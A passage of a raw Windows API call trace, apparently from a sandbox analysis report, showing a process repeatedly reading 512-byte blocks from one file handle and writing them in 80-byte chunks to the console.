lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.651] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.651] GetFileType (hFile=0x50) returned 0x1 [0133.651] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.651] WriteFile (in: hFile=0x50, lpBuffer=0x2ef034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef034*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.651] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.651] GetFileType (hFile=0x50) returned 0x1 [0133.651] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.651] WriteFile (in: hFile=0x50, lpBuffer=0x2ef084*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef084*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.651] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.651] GetFileType (hFile=0x50) returned 0x1 [0133.651] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.651] WriteFile (in: hFile=0x50, lpBuffer=0x2ef0d4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef0d4*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.651] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.651] GetFileType (hFile=0x50) returned 0x1 [0133.651] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.651] WriteFile (in: hFile=0x50, lpBuffer=0x2ef124*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef124*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.651] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.651] GetFileType (hFile=0x50) returned 0x1 [0133.651] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.651] WriteFile (in: hFile=0x50, lpBuffer=0x2ef174*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef174*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.651] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.651] GetFileType (hFile=0x50) returned 0x1 [0133.651] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.651] WriteFile (in: hFile=0x50, lpBuffer=0x2ef1c4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c4*, lpNumberOfBytesWritten=0x2ee1c8*=0x20, lpOverlapped=0x0) returned 1 [0133.651] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.651] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee1b4 | out: lpNewFilePointer=0x0) returned 1 [0133.651] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.651] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.651] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.651] GetFileType (hFile=0x50) returned 0x1 [0133.651] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.651] GetFileType (hFile=0x50) returned 0x1 [0133.651] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.651] WriteFile (in: hFile=0x50, lpBuffer=0x2eefe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.652] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.652] GetFileType (hFile=0x50) returned 0x1 [0133.652] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.652] WriteFile (in: hFile=0x50, lpBuffer=0x2ef034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef034*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.652] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.652] GetFileType (hFile=0x50) returned 0x1 [0133.652] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.652] WriteFile (in: hFile=0x50, lpBuffer=0x2ef084*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef084*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.652] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.652] GetFileType (hFile=0x50) returned 0x1 [0133.652] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.652] WriteFile (in: hFile=0x50, lpBuffer=0x2ef0d4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef0d4*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.652] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.652] GetFileType (hFile=0x50) returned 0x1 [0133.652] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.652] WriteFile (in: hFile=0x50, lpBuffer=0x2ef124*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef124*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.652] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.652] GetFileType (hFile=0x50) returned 0x1 [0133.652] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.652] WriteFile (in: hFile=0x50, lpBuffer=0x2ef174*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef174*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.652] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.652] GetFileType (hFile=0x50) returned 0x1 [0133.652] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.653] WriteFile (in: hFile=0x50, lpBuffer=0x2ef1c4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c4*, lpNumberOfBytesWritten=0x2ee1c8*=0x20, lpOverlapped=0x0) returned 1 [0133.653] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.653] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee1b4 | out: lpNewFilePointer=0x0) returned 1 [0133.653] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.653] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.653] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.653] GetFileType (hFile=0x50) returned 0x1 [0133.653] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.653] GetFileType (hFile=0x50) returned 0x1 [0133.653] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.653] WriteFile (in: hFile=0x50, lpBuffer=0x2eefe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.653] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.653] GetFileType (hFile=0x50) returned 0x1 [0133.653] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.653] WriteFile (in: hFile=0x50, lpBuffer=0x2ef034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef034*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.653] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.653] GetFileType (hFile=0x50) returned 0x1 [0133.653] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.653] WriteFile (in: hFile=0x50, lpBuffer=0x2ef084*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef084*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.653] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.653] GetFileType (hFile=0x50) returned 0x1 [0133.653] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.653] WriteFile (in: hFile=0x50, lpBuffer=0x2ef0d4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef0d4*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.653] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.653] GetFileType (hFile=0x50) returned 0x1 [0133.653] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.653] WriteFile (in: hFile=0x50, lpBuffer=0x2ef124*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef124*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.653] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.653] GetFileType (hFile=0x50) returned 0x1 [0133.653] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.653] WriteFile (in: hFile=0x50, lpBuffer=0x2ef174*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef174*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.653] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.654] GetFileType (hFile=0x50) returned 0x1 [0133.654] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.654] WriteFile (in: hFile=0x50, lpBuffer=0x2ef1c4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c4*, lpNumberOfBytesWritten=0x2ee1c8*=0x20, lpOverlapped=0x0) returned 1 [0133.654] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.654] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee1b4 | out: lpNewFilePointer=0x0) returned 1 [0133.654] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.654] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.654] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.654] GetFileType (hFile=0x50) returned 0x1 [0133.654] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.654] GetFileType (hFile=0x50) returned 0x1 [0133.654] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.654] WriteFile (in: hFile=0x50, lpBuffer=0x2eefe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.654] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.654] GetFileType (hFile=0x50) returned 0x1 [0133.654] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.654] WriteFile (in: hFile=0x50, lpBuffer=0x2ef034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef034*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.654] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.654] GetFileType (hFile=0x50) returned 0x1 [0133.654] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.654] WriteFile (in: hFile=0x50, lpBuffer=0x2ef084*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef084*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.654] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.654] GetFileType (hFile=0x50) returned 0x1 [0133.654] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.654] WriteFile (in: hFile=0x50, lpBuffer=0x2ef0d4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef0d4*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.654] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.654] GetFileType (hFile=0x50) returned 0x1 [0133.654] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.654] WriteFile (in: hFile=0x50, lpBuffer=0x2ef124*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef124*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.655] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.655] GetFileType (hFile=0x50) returned 0x1 [0133.655] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.655] WriteFile (in: hFile=0x50, lpBuffer=0x2ef174*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef174*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.655] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.655] GetFileType (hFile=0x50) returned 0x1 [0133.655] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.655] WriteFile (in: hFile=0x50, lpBuffer=0x2ef1c4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c4*, lpNumberOfBytesWritten=0x2ee1c8*=0x20, lpOverlapped=0x0) returned 1 [0133.655] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.655] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee1b4 | out: lpNewFilePointer=0x0) returned 1 [0133.655] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.655] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.655] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.655] GetFileType (hFile=0x50) returned 0x1 [0133.655] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.655] GetFileType (hFile=0x50) returned 0x1 [0133.655] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.655] WriteFile (in: hFile=0x50, lpBuffer=0x2eefe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.655] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.655] GetFileType (hFile=0x50) returned 0x1 [0133.655] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.655] WriteFile (in: hFile=0x50, lpBuffer=0x2ef034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef034*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.655] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.655] GetFileType (hFile=0x50) returned 0x1 [0133.655] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.655] WriteFile (in: hFile=0x50, lpBuffer=0x2ef084*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef084*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.655] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.655] GetFileType (hFile=0x50) returned 0x1 [0133.655] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.655] WriteFile (in: hFile=0x50, lpBuffer=0x2ef0d4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef0d4*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.655] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.655] GetFileType (hFile=0x50) returned 0x1 [0133.655] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.655] WriteFile (in: hFile=0x50, lpBuffer=0x2ef124*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef124*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.655] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.656] GetFileType (hFile=0x50) returned 0x1 [0133.656] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.656] WriteFile (in: hFile=0x50, lpBuffer=0x2ef174*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef174*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.656] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.656] GetFileType (hFile=0x50) returned 0x1 [0133.656] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.656] WriteFile (in: hFile=0x50, lpBuffer=0x2ef1c4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c4*, lpNumberOfBytesWritten=0x2ee1c8*=0x20, lpOverlapped=0x0) returned 1 [0133.656] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.656] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee1b4 | out: lpNewFilePointer=0x0) returned 1 [0133.656] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.656] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.656] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.656] GetFileType (hFile=0x50) returned 0x1 [0133.656] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.656] GetFileType (hFile=0x50) returned 0x1 [0133.656] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.656] WriteFile (in: hFile=0x50, lpBuffer=0x2eefe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.656] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.656] GetFileType (hFile=0x50) returned 0x1 [0133.656] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.656] WriteFile (in: hFile=0x50, lpBuffer=0x2ef034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef034*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.656] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.656] GetFileType (hFile=0x50) returned 0x1 [0133.656] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.656] WriteFile (in: hFile=0x50, lpBuffer=0x2ef084*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef084*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.656] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.656] GetFileType (hFile=0x50) returned 0x1 [0133.656] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.656] WriteFile (in: hFile=0x50, lpBuffer=0x2ef0d4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef0d4*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.657] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.657] GetFileType (hFile=0x50) returned 0x1 [0133.657] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.657] WriteFile (in: hFile=0x50, lpBuffer=0x2ef124*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef124*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.657] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.657] GetFileType (hFile=0x50) returned 0x1 [0133.657] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.657] WriteFile (in: hFile=0x50, lpBuffer=0x2ef174*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef174*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.657] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.657] GetFileType (hFile=0x50) returned 0x1 [0133.657] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.657] WriteFile (in: hFile=0x50, lpBuffer=0x2ef1c4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c4*, lpNumberOfBytesWritten=0x2ee1c8*=0x20, lpOverlapped=0x0) returned 1 [0133.657] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.657] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee1b4 | out: lpNewFilePointer=0x0) returned 1 [0133.657] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.657] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.657] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.657] GetFileType (hFile=0x50) returned 0x1 [0133.657] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.657] GetFileType (hFile=0x50) returned 0x1 [0133.657] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.657] WriteFile (in: hFile=0x50, lpBuffer=0x2eefe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.657] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.657] GetFileType (hFile=0x50) returned 0x1 [0133.657] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.657] WriteFile (in: hFile=0x50, lpBuffer=0x2ef034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef034*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.658] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.658] GetFileType (hFile=0x50) returned 0x1 [0133.658] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.658] WriteFile (in: hFile=0x50, lpBuffer=0x2ef084*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef084*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.658] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.658] GetFileType (hFile=0x50) returned 0x1 [0133.658] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.658] WriteFile (in: hFile=0x50, lpBuffer=0x2ef0d4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef0d4*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.658] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.658] GetFileType (hFile=0x50) returned 0x1 [0133.658] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.658] WriteFile (in: hFile=0x50, lpBuffer=0x2ef124*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef124*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.658] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.658] GetFileType (hFile=0x50) returned 0x1 [0133.658] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.658] WriteFile (in: hFile=0x50, lpBuffer=0x2ef174*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef174*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.658] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.658] GetFileType (hFile=0x50) returned 0x1 [0133.658] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.658] WriteFile (in: hFile=0x50, lpBuffer=0x2ef1c4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c4*, lpNumberOfBytesWritten=0x2ee1c8*=0x20, lpOverlapped=0x0) returned 1 [0133.658] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.658] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee1b4 | out: lpNewFilePointer=0x0) returned 1 [0133.659] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.659] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.659] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.659] GetFileType (hFile=0x50) returned 0x1 [0133.659] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.659] GetFileType (hFile=0x50) returned 0x1 [0133.659] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.659] WriteFile (in: hFile=0x50, lpBuffer=0x2eefe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.659] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.659] GetFileType (hFile=0x50) returned 0x1 [0133.659] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.659] WriteFile (in: hFile=0x50, lpBuffer=0x2ef034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef034*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.659] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.659] GetFileType (hFile=0x50) returned 0x1 [0133.659] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.659] WriteFile (in: hFile=0x50, lpBuffer=0x2ef084*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef084*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, 